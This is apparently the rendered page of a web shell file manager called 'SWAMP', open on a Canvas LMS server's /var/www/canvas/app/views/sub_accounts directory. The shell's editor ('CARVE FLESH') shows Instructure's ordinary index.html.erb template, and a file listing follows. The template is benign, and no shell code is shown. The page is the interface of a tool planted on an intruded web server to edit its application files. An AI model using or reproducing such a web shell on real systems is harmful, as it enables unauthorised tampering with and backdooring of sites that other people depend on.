░▒▓████████████████████████████████▓▒░ ░▒▓█ ▓▒░ ░▒▓█ ~ S W A M P ~ ▓▒░ ░▒▓█ ▓▒░ ░▒▓████████████████████████████████▓▒░
pplmvsvm
LOCATION:
/var/www/canvas/app/views/sub_accounts
☗ ROOT
↻ REFRESH
✎ CARVE FLESH
EDITING: index.html.erb
<% # Copyright (C) 2011 - present Instructure, Inc. # # This file is part of Canvas. # # Canvas is free software: you can redistribute it and/or modify it under # the terms of the GNU Affero General Public License as published by the Free # Software Foundation, version 3 of the License. # # Canvas is distributed in the hope that it will be useful, but WITHOUT ANY # WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR # A PARTICULAR PURPOSE. See the GNU Affero General Public License for more # details. # # You should have received a copy of the GNU Affero General Public License along # with this program. If not, see <http://www.gnu.org/licenses/>. add_crumb t('titles.sub_accounts', "Sub-Accounts") set_active_tab "sub_accounts" provide :page_title, t('titles.sub_accounts', 'Sub-Accounts') css_bundle :sub_accounts js_bundle :sub_accounts %> <h1 class="screenreader-only"><%= t :page_header_title, 'Sub Accounts' %></h1> <div id="sub_account_urls"> <a href="<%= context_url(@context, :context_sub_account_url, "{{ id }}") %>" class="sub_account_url" style="display: none;"> </a> </div> <% account_data = @accounts[@context.id] %> <%= render :partial => "sub_accounts", :locals => {:account => @context, :depth => 2, :course_count => account_data[:course_count], :sub_account_count => account_data[:sub_account_count]} %> <%= render :partial => "sub_accounts" %>
CANCEL
Name
Type
Size
Modified
Actions
↩ ..
DIR
—
—
📄 _sub_accounts.html.erb
ERB
5.7 KB
2023-09-24 03:36
EDIT
📄 index.html.erb
ERB
1.4 KB
2023-09-24 03:36
EDIT